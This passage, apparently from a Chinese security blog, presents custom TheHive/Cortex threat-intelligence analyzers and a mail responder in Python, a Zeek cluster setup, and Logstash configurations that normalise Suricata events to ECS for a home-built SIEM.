results = self._request(url=url, params=params)
return self.parser_results(results['data'])

def get_compromise(self, ioc):
"""Getting compromise IoC"""
url = self.urls['compromise']
params = {
'apikey': self.key,
'resource': ioc
}
results = self._request(url=url, params=params)
return self.parser_results(list(results['data'].values())[0])


if __name__ == '__main__':
key = '<api_key>'
threat = ThreatBook(key)
# reputation
ioc = '8.8.8.8'
r = threat.get_reputation(ioc)
# compromise
ioc = 'zzv.no-ip.info'
r = threat.get_compromise(ioc)
print(r)
  • threatbook_analyzer.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
#!/usr/bin/env python3
# encoding: utf-8

from threatbook import ThreatBook
from cortexutils.analyzer import Analyzer


class ThreatBookAnalyzer(Analyzer):

def __init__(self):
Analyzer.__init__(self)
self.service = self.get_param(
'config.service', None, 'Service parameter is missing')
self.key = self.get_param(
'config.key', None, 'Missing ThreatBook API key')
self.polling_interval = self.get_param('config.polling_interval', 1)
self.threatbook = ThreatBook(self.key)

def summary(self, raw):
taxonomies = []
level = "info"
namespace = "ThreatBook"
value = "False"

if self.service == 'reputation':
predicate = 'Reputation'
elif self.service == 'compromise':
predicate = 'Compromise'

if raw:
if raw['malicious'] == True:
level = "malicious"
value = "True"

taxonomies.append(self.build_taxonomy(
level, namespace, predicate, value))
return {"taxonomies": taxonomies}

def run(self):
if self.service == 'reputation':
data = self.get_param('data', None, 'Data is missing')
results = self.threatbook.get_reputation(data)
self.report(results)
elif self.service == 'compromise':
data = self.get_param('data', None, 'Data is missing')
results = self.threatbook.get_compromise(data)
self.report(results)
else:
self.error('Invalid data type')


if __name__ == '__main__':
ThreatBookAnalyzer().run()
  • ThreatBook_Compromise.json
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
{
"name": "ThreatBook_Compromise",
"version": "1.0",
"author": "Canon",
"url": "https://github.com/TheHive-Project/Cortex-Analyzers",
"license": "AGPL-V3",
"description": "Get the compromise information of IP、Domain from ThreatBook.",
"dataTypeList": [
"ip",
"domain"
],
"command": "ThreatBook/threatbook_analyzer.py",
"baseConfig": "ThreatBook",
"config": {
"service": "compromise"
},
"configurationItems": [
{
"name": "key",
"description": "API key for ThreatBook",
"type": "string",
"multi": false,
"required": true
},
{
"name": "polling_interval",
"description": "Define time interval between two requests attempts for the report",
"type": "number",
"multi": false,
"required": false,
"defaultValue": 60
}
]
}
  • ThreatBook_Reputation.json
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
{
"name": "ThreatBook_Reputation",
"version": "1.0",
"author": "Canon",
"url": "https://github.com/TheHive-Project/Cortex-Analyzers",
"license": "AGPL-V3",
"description": "Get the reputation information of IP from ThreatBook.",
"dataTypeList": [
"ip"
],
"command": "ThreatBook/threatbook_analyzer.py",
"baseConfig": "ThreatBook",
"config": {
"service": "reputation"
},
"configurationItems": [
{
"name": "key",
"description": "API key for ThreatBook",
"type": "string",
"multi": false,
"required": true
},
{
"name": "polling_interval",
"description": "Define time interval between two requests attempts for the report",
"type": "number",
"multi": false,
"required": false,
"defaultValue": 60
}
]
}

ProxyCheck

  • proxycheck.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
#!/usr/bin/env python3
# encoding: utf-8

import requests


class ProxyCheckError(Exception):
def __init__(self, message):
Exception.__init__(self, message)
self.message = message


class ProxyCheck():
"""
Threat intelligence: ProxyCheck
http://proxycheck.io/v2/
"""

def __init__(self, key):
self.key = key
self.ua = "HappyHunting"
self.session = requests.Session()
self.url = 'http://proxycheck.io/v2/'
self.params = {
'vpn': 1, 'asn': 1, 'time': 1, 'info': 0, 'risk': 1,
'port': 1, 'seen': 1, 'days': 7, 'tag': 'siem'
}

def _request(self, url, params={}):
"""
Request ProxyCheck API
"""
headers = {'User-Agent': self.ua}
r = self.session.get(
url=url,
params=params,
headers=headers
)

if r.status_code != 200:
raise ProxyCheckError(
'Invalid HTTP status code %i' % r.status_code)
return r.json()

def check_proxy(self, data):
"""
Checking proxy information from proxycheck.io
"""
url = self.url + data
self.params['key'] = self.key
results = self._request(url=url, params=self.params)
return self.parser_results(results, data)

def parser_results(self, r, ioc):
"""
Parsing results
"""
intel = {}
if r['status'] == 'ok':
intel = {
'ip': ioc,
'country': r[ioc]['country'],
'city': r[ioc]['proxy'],
'proxy': r[ioc]['proxy'],
'type': r[ioc]['type'],
'provider': r[ioc]['provider']
}
return intel


if __name__ == '__main__':
key = '<api_key>'
proxycheck = ProxyCheck(key)

ioc = '8.8.8.8'
r = proxycheck.check_proxy(ioc)
print(r)
  • proxycheck_analyzer.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
#!/usr/bin/env python3
# encoding: utf-8

from proxycheck import ProxyCheck
from cortexutils.analyzer import Analyzer


class ProxyCheckAnalyzer(Analyzer):

def __init__(self):
Analyzer.__init__(self)
self.service = self.get_param(
'config.service', None, 'Service parameter is missing')
self.key = self.get_param(
'config.key', None, 'Missing ProxyCheck API key')
self.polling_interval = self.get_param('config.polling_interval', 1)
self.proxycheck = ProxyCheck(self.key)

def summary(self, raw):
taxonomies = []
level = "info"
namespace = "ProxyCheck"
predicate = "Proxy"
value = "False"

if raw.get("proxy") == "yes":
level = "suspicious"
value = "True"

taxonomies.append(self.build_taxonomy(
level, namespace, predicate, value))
return {"taxonomies": taxonomies}

def run(self):
if self.service == 'proxycheck':
data = self.get_param('data', None, 'Data is missing')
results = self.proxycheck.check_proxy(data)
self.report(results)
else:
self.error('Invalid data type')


if __name__ == '__main__':
ProxyCheckAnalyzer().run()
  • ProxyCheck.json
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
{
"name": "ProxyCheck",
"version": "1.0",
"author": "Canon",
"url": "https://github.com/TheHive-Project/Cortex-Analyzers",
"license": "AGPL-V3",
"description": "Get the compromise information of IP from ProxyCheck.",
"dataTypeList": ["ip"],
"command": "ProxyCheck/proxycheck_analyzer.py",
"baseConfig": "ProxyCheck",
"config": {
"service": "proxycheck"
},
"configurationItems": [
{
"name": "key",
"description": "API key for ProxyCheck",
"type": "string",
"multi": false,
"required": true
},
{
"name": "polling_interval",
"description": "Define time interval between two requests attempts for the report",
"type": "number",
"multi": false,
"required": false,
"defaultValue": 60
}
]
}

Responders - 插件

Mail

Cortex默认有一个插件(Mailer)负责发送邮件。使用了一下发现比较“坑”,首先不支持对多个收件人的发送,且当选择从Observables中发送邮件时,收件人竟然是mail类型的IoC。。。 WTF!别问我怎么知道的,它源码里就是这么写的。。。所以,自己动手丰衣足食!

主要功能:

  1. 在原有的基础上新增了批量发送的功能;
  2. 新增了支持对task logs数据类型的发送;
  3. 发送邮件时会附带当前case或者taskURL,便于收件人快速浏览问题;
  • mail.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
#!/usr/bin/env python3
# encoding: utf-8

import ssl
import smtplib
import mistune
from cortexutils.responder import Responder
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText


class Mail(Responder):
def __init__(self):
Responder.__init__(self)
self.smtp_host = self.get_param("config.smtp_host", "localhost")
self.smtp_port = self.get_param("config.smtp_port", "25")
self.mail_from = self.get_param(
"config.from", None, "Missing sender email address"
)
self.smtp_user = self.get_param("config.smtp_user", "user", None)
self.smtp_pwd = self.get_param("config.smtp_pwd", "pwd", None)
self.thehive_url = self.get_param("config.thehive_url", None, None)

def create_links(self):
"""
Create TheHive links
:rtype: String
:return: URL
"""
if self.data_type == "thehive:case":
case_id = self.get_param(
"data.id", None, "case id is missing"
)
url = self.thehive_url + "/index.html#!/case/{}/details".format(case_id)
elif self.data_type == "thehive:case_task":
case_id = self.get_param(
"data.case.id", None, "case id is missing"
)
task_id = self.get_param(
"data.id", None, "task id is missing"
)
url = self.thehive_url + "/index.html#!/case/{}/tasks/{}".format(case_id, task_id)
elif self.data_type == "thehive:case_task_log":
case_id = self.get_param(
"data.case_task.case.id", None, "case id is missing"
)
task_id = self.get_param(
"data.case_task.id", None, "task id is missing"
)
url = self.thehive_url + "/index.html#!/case/{}/tasks/{}".format(case_id, task_id)
return url

def run(self):
Responder.run(self)
if self.data_type == "thehive:case_task_log":
title = self.get_param(
"data.case_task.title", None, "title is missing")
else:
title = self.get_param("data.title", None, "title is missing")

if self.data_type in ["thehive:case", "thehive:case_task"]:
description = self.get_param(
"data.description", None, "case description is missing"
)
elif self.data_type == "thehive:case_task_log":
description = self.get_param(
"data.message", None, "task logs description is missing"
)
elif self.data_type == "thehive:alert":
description = self.get_param(
"data.case.description", None, "alert description is missing"
)
else:
self.error("Invalid dataType")

mail_to = []
if self.data_type == "thehive:case":
# Search recipient address in case tags
tags = self.get_param(
"data.tags", None, "recipient address not found in tags"
)
mail_tags = [t[5:] for t in tags if t.startswith("mail:")]
if mail_tags:
mail_to = mail_tags
else:
self.error("recipient address not found in tags")

elif self.data_type in ["thehive:case_task", "thehive:case_task_log"]:
# Search recipient address in tasks description
descr_array = description.splitlines()
if "mailto:" in descr_array[0]:
mail_str = descr_array[0].replace("mailto:", "").strip()
mail_to = [i.strip() for i in mail_str.split(',')]
else:
self.error("recipient address not found in description")
# Set rest of description as body
description = "\n".join(descr_array[1:])

elif self.data_type == "thehive:alert":
# Search recipient address in artifacts
artifacts = self.get_param(
"data.artifacts", None, "recipient address not found in observables"
)
mail_artifacts = [
a["data"]
for a in artifacts
if a.get("dataType") == "mail" and "data" in a
]
mail_tags = [
t[5:]
for t in mail_artifacts
if t.startswith("mail:")
]
if mail_tags:
mail_to = mail_tags
else:
self.error("recipient address not found in observables")

msg = MIMEMultipart()
msg["Subject"] = title
msg["From"] = self.mail_from
msg["To"] = ','.join(mail_to)
# Markdown to HTML
content = mistune.markdown(description, escape=True, hard_wrap=True)
# add TheHive Links
links = self.create_links()
content += '\n<p><a href="{}">Click me to TheHive</a></p>\n'.format(links)
msg.attach(MIMEText(content, "html", "utf-8"))

if self.smtp_user and self.smtp_pwd:
try:
context = ssl.create_default_context()
with smtplib.SMTP(self.smtp_host, self.smtp_port) as server:
server.ehlo()
server.starttls(context=context)
server.ehlo()
server.login(self.smtp_user, self.smtp_pwd)
server.send_message(msg, self.mail_from, mail_to)
except smtplib.SMTPNotSupportedError:
with smtplib.SMTP(self.smtp_host, self.smtp_port) as server:
server.ehlo()
server.login(self.smtp_user, self.smtp_pwd)
server.send_message(msg, self.mail_from, mail_to)
else:
with smtplib.SMTP(self.smtp_host, self.smtp_port) as server:
server.send_message(msg, self.mail_from, mail_to)

self.report({"message": "message sent"})

def operations(self, raw):
return [self.build_operation("AddTagToCase", tag="mail sent")]


if __name__ == "__main__":
Mail().run()
  • Mail.json
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
{
"name": "Mail",
"version": "1.0",
"author": "Canon",
"url": "https://github.com/TheHive-Project/Cortex-Analyzers",
"license": "AGPL-V3",
"description": "Send an email with information from a TheHive case or alert",
"dataTypeList": ["thehive:case", "thehive:alert", "thehive:case_task", "thehive:case_task_log"],
"command": "Mail/mail.py",
"baseConfig": "Mail",
"configurationItems": [
{
"name": "from",
"description": "email address from which the mail is send",
"type": "string",
"multi": false,
"required": true
},
{
"name": "smtp_host",
"description": "SMTP server used to send mail",
"type": "string",
"multi": false,
"required": true,
"defaultValue": "localhost"
},
{
"name": "smtp_port",
"description": "SMTP server port",
"type": "number",
"multi": false,
"required": true,
"defaultValue": 25
},
{
"name": "smtp_user",
"description": "SMTP server user",
"type": "string",
"multi": false,
"required": false,
"defaultValue": "user"
},
{
"name": "smtp_pwd",
"description": "SMTP server password",
"type": "string",
"multi": false,
"required": false,
"defaultValue": "pwd"
},
{
"name": "thehive_url",
"description": "TheHive server address",
"type": "string",
"multi": false,
"required": true,
"defaultValue": "http://localhost:9000"
}
]
}

Threat Intelligence

​ 其实默认TheHive是推荐与MISP进行对接实现情报的feed。由于我们自建了威胁情报库,所以写了一个Responders插件,帮助在分析时提交IoC情报。这边代码就不上了。给出一个提交的用例:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
{
"threat": {
"ioc": "193.142.146.143",
"type": "ip",
"tags": [
"burp scan"
],
"description": "该IP在短时间内对用户登录接口发起大量访问,且包含着大量登录失败的情况",
"created_by": "canon@loveyou.com",
"producer": "Canon",
"provider": "TheHive",
"creation_time": "2021-05-14T09:48:23.664Z",
"modification_time": "2021-05-14T09:48:23.664Z",
"expiration_time": "2021-05-29T09:48:23.664Z",
"meta": {
"case": [
{
"title": "安全分析 - 周报(05.10-05.14)",
"created_by": "canon@loveyou.com",
"owner": "canon@loveyou.com",
"link": "https://127.0.0.1:9000/index.html#!/case/~43769904/observables/~463080"
}
]
}
},
"timestamp": "2021-05-14T09:48:23.664Z"
}

如何启用插件

加载插件

  • 插件路径
    • /etc/cortex/Cortex-Analyzers/analyzers
    • /etc/cortex/Cortex-Analyzers/responders
1
2
3
4
5
6
7
8
9
10
$ ll /etc/cortex/Cortex-Analyzers/analyzers
drwxr-xr-x 10 root root 4096 May 5 01:48 ./
drwxr-xr-x 10 root root 4096 May 5 01:49 ../
drwxr-xr-x 2 root root 4096 May 5 01:48 ProxyCheck/
drwxr-xr-x 2 root root 4096 May 5 01:48 ThreatBook/

$ ll /etc/cortex/Cortex-Analyzers/responders
drwxr-xr-x 6 root root 4096 May 5 01:49 ./
drwxr-xr-x 10 root root 4096 May 5 01:49 ../
drwxr-xr-x 2 root root 4096 May 5 01:49 Mail/
  • 修改配置文件/etc/cortex/application.conf

    建议大家将新增的插件与官方的插件区别开,这样后期也便于维护。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
## ANALYZERS
#
analyzer {
urls = [
"https://download.thehive-project.org/analyzers.json"
"/etc/cortex/Cortex-Analyzers/analyzers" # 新增自定义插件
]
}

# RESPONDERS
#
responder {
urls = [
"https://download.thehive-project.org/responders.json"
"/etc/cortex/Cortex-Analyzers/responders" # 新增自定义插件
]
}

启用插件

  • Analyzers

    • ThreatBook - Analyzers Config

    ![Analyzers Config](/Analyzers Config.png)

    • ThreatBook - Analyzers

    Analyzers

  • Responders

    • Mail - Responders Config

    ![Responders Config](/Responders Config.png)

    • Mail - Responders

    Responders

使用场景

​ 下面来说一下我们都用TheHive做了哪些,刚开始使用场景其实并不多,还需要后期的摸索。

workflow

提前创建好模板,例如:按照Playbook的形式提前创建好。便于后期快速引用

  • 分析周报模板

    按照周为单位创建Case,以天为单位创建Task。

    周报模板

  • 应急响应模板

    可以参照应急响应阶段来创建

    应急响应

  • 引用模板

    引用模板

  • 事件运营:SIEMAlarm) -> TheHiveAlert

    TheHiveSIEM做了对接,主要将两种类型的告警自动化的推送到了TheHive上。

    • 第一种:需要研判的安全事件。例如:基于内->外的NetFlow告警事件(异常端口访问,周期性请求等等)、敏感信息泄漏告警事件(黑客论坛监控、GitHub监控)。通常这类事件需要进行二次确认的,所以会选择通过TheHive来记录整个事件的处理过程。

      人工研判事件-1

    • 第二种:需要重点关注的安全事件。例如:EDR上的告警事件,命中C2指标的情报告警,通常这类事件需要第一时间去响应。

      • 在事件响应的过程中我们可以借助Cortex Analyzers的能力协助我们进行数据分析。如:同时调用多家情报厂商接口进行查询,丰富化数据信息(查询PDNS信息、Whois信息、CMDB等),联动SIEM查询近一段时间内的安全事件等。
      • 对于已“实锤”的指标,可通过Cortex Responders组件与安全设备进行联动,批量下发阻断策略,及时止损。
      • 对于跨部门协作的问题,可利用TheHive去同步事件响应的进度,包括在同一个Case里讨论该问题。
      • 通过对响应过程的记录,可更好的帮助我们去优化安全事件响应流程,并同时帮助我们积累Playbook,为日后的自动化做铺垫。
  • 规则运营:SIEMAlarmAlert)-> TheHiveCase

    ​ 主要是将分析时发现的规则误报以及漏报的情况,通过手动提交Case的形式发送到TheHive上。例如,在SIEM上发现了某个告警存在误报的现象,通过SIEM提交该告警信息给指定负责人,系统会自动将邮件以及Case转到该人员名下。

    • 通过SIEM推送至TheHive,并通知分析人员进行规则优化。

    规则运营-4

    • 提交Case并邮件通知

    规则运营-5

    规则运营-6

    • TheHive

    规则运营-7

    规则运营-8

  • 日常事项:

    • 安全分析周报

      • 以周为单位创建Case

      安全分析周报01

      • 以天为单位创建Task

      安全分析周报03

      • 告警与Case相关联

      安全分析周报05

      • 批量分析IoC

      安全分析周报02

      • 分享给需要关注的小组

      安全分析周报04


写在最后:

​ 如果你有关注过开源解决方案的话,相信你一定有看到过一些TheHive与工作流(**Shufflen8n)组件整合的方案。不难看出,TheHive擅长的是事件响应与分析,这是一种半自动化的形式。通过与工作流组件的对接,你会发现这就是一个“散装*”版的SOAR。商业的SOAR相比开源的SOAR多了一个“作战室”的概念,这个功能与TheHive就会有那么一些相似。例如:你可以在作战室中分析某个IP的情报信息,或者联动现有安全设备对某个IoC进行响应的操作。这些功能其实就是对应到了TheHive中的AnalyzersResponders*的功能。

​ 我个人觉得TheHive这种“半自动化”的形式,可以很好的与SOAR进行互补,相信与SOAR对接后会有更多的“价值”被体现出来。例如:在分析任务中可按照场景的不同有选择的调用SOARPalyBook,并将响应结果feedbackTheHive中。其实TheHive上还有挺多东西值得说的,一次也写不完。更多东西还需要我们根据实际场景再去挖掘,“思路”很重要!

安装

在线安装

1
2
3
4
$ echo 'deb http://download.opensuse.org/repositories/security:/zeek/Debian_10/ /' | sudo tee /etc/apt/sources.list.d/security:zeek.list
$ curl -fsSL https://download.opensuse.org/repositories/security:zeek/Debian_10/Release.key | gpg --dearmor | sudo tee /etc/apt/trusted.gpg.d/security_zeek.gpg > /dev/null
$ sudo apt update
$ sudo apt install zeek

架构图

_images / deployment.png

Manager -> Worker

  1. 在设置集群时,必须在所有主机上设置Zeek用户,并且该用户必须能够从管理器中对集群中的所有机器进行ssh访问,并且必须在不被提示密码/口令的情况下工作(例如,使用ssh公钥认证)。另外,在工作节点上,该用户必须能够以混杂模式访问目标网络接口。
  2. 存储必须在同一路径下的所有主机上可用。
Manager
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
# 安装Zeek 略过

# 生成SSH Key
$ ssh-keygen

# 记得Worker节点需要创建.ssh目录

# 复制ssh pub到Zeek Worker
$ scp /root/.ssh/id_rsa.pub root@Zeek-Worker1:~/.ssh/authorized_keys2

# 配置Manager node.cfg
$ vim /opt/zeek/etc/node.cfg
[logger-1]
type=logger
host=Zeek-Manager
#
[manager]
type=manager
host=Zeek-Manager
#
[proxy-1]
type=proxy
host=Zeek-Manager
#
[worker-1]
type=worker
host=Zeek-Worker1
interface=ens224
#
[worker-2]
type=worker
host=Zeek-Worker2
interface=ens224

# 检查Zeek
$ zeekctl
[ZeekControl] > check
logger-1 scripts are ok.
manager scripts are ok.
proxy-1 scripts are ok.
worker-1 scripts are ok.
worker-2 scripts are ok.

# 启动Zeek
$ zeekctl
[ZeekControl] > start
starting logger ...
starting manager ...
starting proxy ...
starting workers ...

集群中性能是否对于单台有优化待测试

背景

​ 由于工作比较忙,有段时间没有更了,快到年底了,就当是总结了。今年主要精力都是在围绕着安全运营这一块的工作,随着工作的开展发现自己“组装”的SIEM用起来不是很“舒服”。这是我之前写的一篇《Wazuh-如何对异构数据进行关联告警》的文章,当时规划的数据流的Workflow如下图所示。

image-20200303215020561

“散装”SIEM主要是建立在ELK的框架之上,告警模块分别采用了Wazuh与Elastalert。早期为了使Wazuh能够消费异构数据(WAF、NTA、EDR)并进行关联告警,我在数据入库之前利用Logstash对异构数据进行了标准化,同时Wazuh对标准化后的数据进行关联。例如:Suricata通过Filebeat将告警事件发出,由Logstash统一进行标准化处理并同时输出到Elastic以及Wazuh。其中Elastic为告警的元数据,推送到Wazuh上的为标准化后的安全事件。


“散装”SIEM v0.1的不足与改进措施

1. 数据标准化

​ 由于前期的标准化未采用**ECS**(Elastic Common Schema),导致后期沿用Elastic生态的时候出现了使用上的不便。大家都知道ES在7.X的版本推出了SIEM这个功能,如果想使用Elastic SIEM进行分析的话,那么ECS是首选。这里为了后期与开源生态更好的进行融合,需要将原先的标准化转为ECS的格式。

2. 告警丰富化

为了更有效的提升告警质量,提高安全分析的效率。需要对入库的安全事件以及产生的告警进行必要的丰富化。

  • 利用CMDB平台的数据对内部资产进行丰富化。例如增加:部门、业务、应用类型、负责人等字段。

  • 对接威胁情报数据,SIEM会对告警事件的攻击IP进行情报侧数据的丰富化;

    • 本地威胁情报(曾经攻击过我们的IP地址)
    • 第三方威胁情报
      • 开源
      • 商业
  • 敏感接口监控(如:登录接口、支付接口、钱包接口)。利用第三方数据对IP地址进行Proxy标记,为后期风控的研判提供一些数据支撑;

  • 为安全事件增加方向与区域的字段。便于分析人员第一时间识别内对内以及内对外的告警。也可针对方向进行告警级别的权重调整;

3. 提升检测能力

底层安全设备的检测能力与安全事件的可信度,是直接影响SIEM告警的关键因素。

  • 接入Imperva WAF的告警数据,与Suricata进行自动化关联,定期将绕过的规则“移植”到前端的Imperva WAF上,加强边界的安全防护能力;
  • “消费”AWS VPC FLOW数据,增加内对外的异常连接检测能力。由于是四层数据能够被“消费”的维度实在不多。主要实现了以下几种告警:
    • 周期性连接告警
    • 威胁情报类告警
    • 端口扫描类告警
      • 短时间内,内网主机请求相同目的IP的多个端口
      • 短时间内,内网主机请求多个IP的相同目的端口
    • 敏感端口请求告警

4. 溯源分析

目前SIEM产生的告警,并不会携带原始的安全事件,这对于分析小伙伴来说并不友好,特别是告警量比较多的时候。

  • 现已为每一个告警增加了**”Hunting”**的字段,通过该字段可直接溯源到底层的安全事件;
  • 增加了更适用于安全分析人员使用的仪表盘;
  • 编写了一个自认为比较贴合分析人员使用的工具:HappyHunting

5. 其他改进

  • 解决了SIEM联动CDN WAF API响应时间过长(15-20分钟 😅)的问题。目前与Imperva WAF API联动已做到了准实时。

  • 优化NTA login_audit代码,提升NTA性能。之前写过一篇文章《**Suricata + Lua实现本地情报对接**》,主要利用了Lua脚本对“敏感”接口进行登录审计并利用情报进行高危账号检测。现已将这部分功能移植到Logstash + Ruby上;

  • 之前的自动化联动规则都是通过手动修改脚本调整rule.id来实现,这种方式在初期还能勉强运行。但在后期运行中暴露出了不足,既不便于管理也增加了维护的成本。所以为了维护SIEM的规则,这里采用了Redis来进行规则的统一管理。后期只需要将需要阻断的rule.id推送至Redis即可。同时也在输出的告警中通过event.action字段标准该告警的响应方式;


“进化” - “散装”SIEM v0.2

1. Workflow

​ 这是重新调整之后的“散装”SIEM v0.2的workflow😁。如下图所示,数据源采集端这里就不展开来说了,都是现成的工具发就完事儿了。下面主要说一下Logstash中对数据处理的部分:

SIEM-v0.2


2. 数据处理

1. Normalized

image-20201208110506481


1.1 normalized-alert_to_siem

​ 针对alert事件进行标准化,也就是安全设备发出的数据。参考上图中蓝色线所示部分

​ 官方已支持Suricata数据的ECS,我们可直接启用filebeat的Suricata模块。但是,这里需要注意一点,默认Suricata的模块中有一些标准化是交由Elastic来做的。由于我们需要利用Logstash做后续的ETL部分,所以现在的整个数据流是:Filebeat -> Logstash -> Elastic。那么,这一部分的标准化,需要我们在Logstash层面来实现。具体涉及到的配置如下:

1.1.1 normalized-suricata

​ 通用Suricata事件标准化配置。

  • 删除一些filebeat自带的字段。
  • 增加providerproductsensor等字段,为了后期区分不同的数据源类型,(例:NTA、WAF、EDR),以及不同的NTA产品(例:Suricata、Zeek
Logstash Config
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
filter {
mutate {
remove_field => [ "application", "type", "agent", "@version", "[event][original]" ]
add_field => {
"provider" => "Suricata"
"product" => "IDS"
"sensor" => "%{[host][name]}"
}
lowercase => [ "[network][transport]" ]
}
uuid {
target => "[event][id]"
overwrite => true
}
}

1.1.2 normalized-alert_for_suricata
Logstash Config
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
filter {
if [suricata][eve][alert] {
mutate {
rename => {
"[suricata][eve][alert][category]" => "[rule][category]"
"[suricata][eve][alert][signature_id]" => "[rule][id]"
"[suricata][eve][alert][signature]" => "[rule][name]"
"[suricata][eve][alert][rule]" => "[rule][description]"
}
}

mutate {
convert => {
"[rule][id]" => "integer"
}
copy => {
"[rule][category]" => "message"
}
}

if [suricata][eve][alert][action] == "blocked" {
mutate {
update => {
"[suricata][eve][alert][action]" => "denied"
}
}
}

if [suricata][eve][alert][action] {
ruby {
code => "
action = event.get('[suricata][eve][alert][action]')

event_type = event.get('[event][type]')
if event_type then
event_type = event.get('[event][type]').push(action)
else
event_type = [action]
end
event.set('[event][type]', event_type)
event.remove('[suricata][eve][alert][action]')

event.set('[event][action]', action)
"
}
}

mutate {
rename => {
"[suricata][eve][alert][severity]" => "[event][severity]"
"[suricata][eve][payload_printable]" => "[rule][payload]"
"[suricata][eve][http][http_request_body_printable]" => "[http][request][body][content]"
"[suricata][eve][http][http_response_body_printable]" => "[http][response][body][content]"
}
}

ruby {
code => "
rule_id = event.get('[rule][id]')
rule_name = event.get('[rule][name]')
event_id = event.get('[event][id]')

event.set('[related][rule][id]', [rule_id])
event.set('[related][rule][name]', [rule_name])
event.set('[related][event][id]', [event_id])
"
}
}
}

1.1.3 normalized-fileinfo_for_suricata
Logstash Config
1
2
3
4
5
6
7
8
9
10
filter {
if [suricata][eve][fileinfo] {
mutate {
rename => {
"[suricata][eve][fileinfo][filename]" => "[file][path]"
"[suricata][eve][fileinfo][size]" => "[file][size]"
}
}
}
}

1.1.4 normalized-flow_for_suricata
Logstash Config
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
filter {
if [suricata][eve][flow] {
mutate {
rename => {
"[suricata][eve][flow][pkts_toclient]" => "[destination][packets]"
"[suricata][eve][flow][pkts_toserver]" => "[source][packets]"
"[suricata][eve][flow][bytes_toclient]" => "[destination][bytes]"
"[suricata][eve][flow][bytes_toserver]" => "[source][bytes]"
}
}

ruby {
init => "
@sb = 0
@sp = 0
@db = 0
@dp = 0
"

code => "
events = event.to_hash

if events.has_key?('source') then
@sb = events['source'].fetch('bytes', 0)
@sp = events['source'].fetch('packets', 0)
end

if events.has_key?('destination') then
@db = events['destination'].fetch('bytes', 0)
@dp = events['destination'].fetch('packets', 0)
end

if (@sb+@db+@sp+@dp > 0) then
if (@sb+@db > 0) then
event.set('[network][bytes]', @sb+@db)
end
if (@sp+@dp > 0) then
event.set('[network][packets]', @sp+@dp)
end
end
"
}

date {
match => [ "[suricata][eve][flow][start]", "ISO8601" ]
target => "[event][start]"
}

date {
match => [ "[suricata][eve][flow][end]", "ISO8601" ]
target => "[event][end]"
}

mutate {
rename => {
"[suricata][eve][flow][age]" => "[event][duration]"
}
}

mutate {
remove_field => [
"[suricata][eve][flow][start]",
"[suricata][eve][flow][end]"
]
}
}
}

1.1.5 normalized-http_for_suricata
Logstash Config
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
filter {
if [suricata][eve][http] {
mutate {
rename => {
"[suricata][eve][http][http_method]" => "[http][request][method]"
"[suricata][eve][http][status]" => "[http][response][status_code]"
"[suricata][eve][http][hostname]" => "[destination][domain]"
}
}

if [destination][domain] and [network][protocol] == "http" {
mutate {
copy => { "[destination][domain]" => "[url][domain]" }
}
}

ruby {
init => "
@pattern = /(?<path>[^?#]*)(?:\?(?<query>[^#]*))?(?:#(?<fragment>.*))?/
"
code => "
url = event.get('[suricata][eve][http][url]')
res = @pattern.match(url)

if res['path'] then
event.set('[url][path]', res['path'])
end
if res['query'] then
event.set('[url][query]', res['query'])
end
if res['fragment'] then
event.set('[url][fragment]', res['fragment'])
end
"
}

mutate {
rename => {
"[suricata][eve][http][url]" => "[url][original]"
"[suricata][eve][http][http_refer]" => "[http][request][referrer]"
"[suricata][eve][http][length]" => "[http][response][body][bytes]"
"[suricata][eve][http][http_user_agent]" => "[user_agent][original]"
}
}
}
}

1.1.6 normalized_http_headers_for_suricata

